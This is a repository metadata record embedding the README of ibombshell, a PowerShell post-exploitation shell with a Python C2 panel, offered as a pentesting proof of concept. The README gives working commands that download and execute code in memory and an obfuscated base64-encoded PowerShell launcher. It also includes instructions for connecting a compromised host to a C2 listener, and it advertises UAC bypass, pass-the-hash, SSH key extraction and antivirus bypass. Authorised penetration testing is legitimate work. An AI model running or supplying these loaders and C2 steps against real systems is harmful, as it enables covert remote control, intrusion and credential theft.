{"id":13454364,"url":"https://github.com/Telefonica/ibombshell","last_synced_at":"2025-03-24T05:33:40.998Z","repository":{"id":41433623,"uuid":"140594576","full_name":"Telefonica/ibombshell","owner":"Telefonica","description":"Tool to deploy a post-exploitation prompt at any time","archived":false,"fork":false,"pushed_at":"2021-05-28T09:57:26.000Z","size":2963,"stargazers_count":307,"open_issues_count":2,"forks_count":73,"subscribers_count":19,"default_branch":"master","last_synced_at":"2024-04-14T14:22:34.501Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Telefonica.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-07-11T15:25:41.000Z","updated_at":"2024-02-10T21:22:39.000Z","dependencies_parsed_at":"2022-08-25T06:22:44.299Z","dependency_job_id":null,"html_url":"https://github.com/Telefonica/ibombshell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Telefonica%2Fibombshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Telefonica%2Fibombshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Telefonica%2Fibombshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Telefonica%2Fibombshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Telefonica","download_url":"https://codeload.github.com/Telefonica/ibombshell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com"
,"kind":"github","repositories_count":245217428,"owners_count":20579291,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T08:00:53.442Z","updated_at":"2025-03-24T05:33:40.954Z","avatar_url":"https://github.com/Telefonica.png","language":"Python","readme":"![Supported Python versions](https://img.shields.io/badge/python-3.6-blue.svg?style=flat-square)\n![License](https://img.shields.io/badge/license-GNU-green.svg?style=flat-square)\n\n# **ibombshell - Dynamic Remote Shell**\n\n```\n      ,--.!,    _ ____                  __   _____ __         ____\n   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /\n ,d08b.  '|`  / / __  / __ \\/ __ `__ \\/ __ \\\\__ \\/ __ \\/ _ \\/ / /\n 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /\n `9MMP'     /_/_____/\\____/_/ /_/ /_/_.___/____/_/ /_/\\___/_/_/\n\n [+] Starting the console...\n [*] Console ready!\n```\n\n**ibombshell** is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as _everywhere_.\n\nIn addition, _ibombshell_ provides a second execution mode called _Silently_, so the pentester can execute an instance of ibombshell (called _warrior_). The compromised computer will be connected to a C2 panel through HTTP. 
Therefore, it will be possible to control the warrior and load functions in memory that help the pentester. This takes place within the post-exploitation phase.\n\n# Prerequisites\n\nTo run _ibombshell everywhere_ it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the [PowerShell GitHub](https://github.com/PowerShell/PowerShell) - _PowerShell for every system!_.\n\nTo run the _ibombshell silently mode_ you need Python 3.6 and some Python libraries. You can install them with:\n\n```[python]\ncd ibombshell\\ c2/\npip install -r requirements.txt\n```\n\n**Note**: ibombshell C2 works with **python 3.X**. Make sure you run the pip that belongs to this version.\n\n# Usage\n\nibombshell has two execution modes:\n\n## ibombshell everywhere\n\nTo load ibombshell simply run on PowerShell:\n\n```[powershell]\niex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)\n```\n\nNow you can run the downloaded ibombshell console running:\n\n```[powershell]\nconsole\n```\n\n### ibombshell everywhere in isolated environments\n\nIf you need to use ibombshell in isolated environments, you must prepare your computer first in a networked environment. 
Load all the functions you will need, and use savefunctions to save them in the Windows registry.\n\nNow you can use this base 64 code to get ibombshell:\n\n```[powershell]\npowershell.exe -E \"JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ\nBzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6\nADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG\n8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA\nYwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ\nB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv\nAHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A\"\n```\n\n## ibombshell silently mode\n\nThis version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. 
To run this version, first you must launch the console process in powershell:\n\n```[powershell]\niex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)\n```\n\nOn ibombshell C2 path, prepare the C2:\n\n```[python]\npython3 ibombshell.py\n```\n\nAnd create the listener where the warriors will connect:\n\n```[ibombshell]\niBombShell\u003e load modules/listener.py\n[+] Loading module...\n[+] Module loaded!\niBombShell[modules/listener.py]\u003e run\n```\n\nThe default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:\n\n```[powershell]\nconsole -Silently -uriConsole http://[ip or domain]:[port]\n```\n\n# ibombshell C2 scheme\n\nThe basic operation of the ibombshell control panel follows this scheme:\n\n```[ascii]\n        ibombshell                 C2\n            |                      |\n            |    newibombshell     |\n            +---------------------\u003e| --+ register\n            |                      |\u003c--+ from IP\n            |    get functions     |\n            |   and instructions   |\n            +---------------------\u003e|\n            |                      |\n            |    send functions    |\n            |   and instructions   |\nexecute +-- |\u003c---------------------+\n        +--\u003e|                      |\n            |       results        |\n            +---------------------\u003e|\n            |                      |\n```\n\n# Docker\n\nWe have created a docker container with everything you need to make it work. 
Run this command from Dockerfile location.\n\n```[bash]\nsudo docker build -t \"ibombshell\" .\nsudo docker run -it ibombshell\n```\n\n# Example videos\n\nSome example videos...\n\n### _iBombShell: PoC Warrior + Bypass UAC + Pass the hash_\n\n[![iBombShell: PoC Warrior + Bypass UAC + Pass the hash](https://img.youtube.com/vi/v4c8MsOPTyA/0.jpg)](http://www.youtube.com/watch?v=v4c8MsOPTyA)\n\n### _iBombShell: macOS_\n\n[![iBombShell: PoC de uso desde macOS](https://img.youtube.com/vi/DQlWGPS1CB4/0.jpg)](http://www.youtube.com/watch?v=DQlWGPS1CB4)\n\n### _ibombshell: Extracting Private SSH Keys on Windows 10_\n\n[![ibombshell: Módulo para extracción de claves privadas SSH en Windows 10](https://img.youtube.com/vi/v7iXEg9cTNY/0.jpg)](http://www.youtube.com/watch?v=v7iXEg9cTNY)\n\n### _iBombShell: PoC savefunctions_\n\n[![iBombShell: PoC savefunctions](https://img.youtube.com/vi/QM0HufCYOEk/0.jpg)](https://www.youtube.com/watch?v=QM0HufCYOEk)\n\n### _ibombshell - Silently bypass UAC Environment Injection_\n\n[![ibombshell - Modo silencioso para el bypass UAC Environment Injection](https://img.youtube.com/vi/XrWM2gcXo3w/0.jpg)](https://www.youtube.com/watch?v=XrWM2gcXo3w)\n\n### _iBombShell - Mocking Trusted Directory_\n\n[![iBombShell - Mocking Trusted Directory](https://img.youtube.com/vi/6iCFS4FkedM/0.jpg)](https://www.youtube.com/watch?v=6iCFS4FkedM)\n\n### _iBombShell - DLL generation_\n\n[![iBombShell - DLL Generation](https://img.youtube.com/vi/I03klvk-DXo/0.jpg)](https://www.youtube.com/watch?v=I03klvk-DXo)\n\n### _iBombShell - AMSI \u0026 Windows Defender Bypass_\n\n[![iBombShell - AMSI \u0026 Windows Defender Bypass](https://img.youtube.com/vi/wCBLG3CfWMY/0.jpg)](https://www.youtube.com/watch?v=wCBLG3CfWMY)\n\n# License\n\nThis project is licensed under the GNU General Public License - see the LICENSE file for details\n\n# Contact\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES 
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.\n\nThis software doesn't have a QA Process. This software is a Proof of Concept.\n\nIf you have any problems, you can contact:\n\nideaslocas@telefonica.com\n\n","funding_links":[],"categories":["Tools","Python"],"sub_categories":["Open Source"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTelefonica%2Fibombshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FTelefonica%2Fibombshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTelefonica%2Fibombshell/lists"}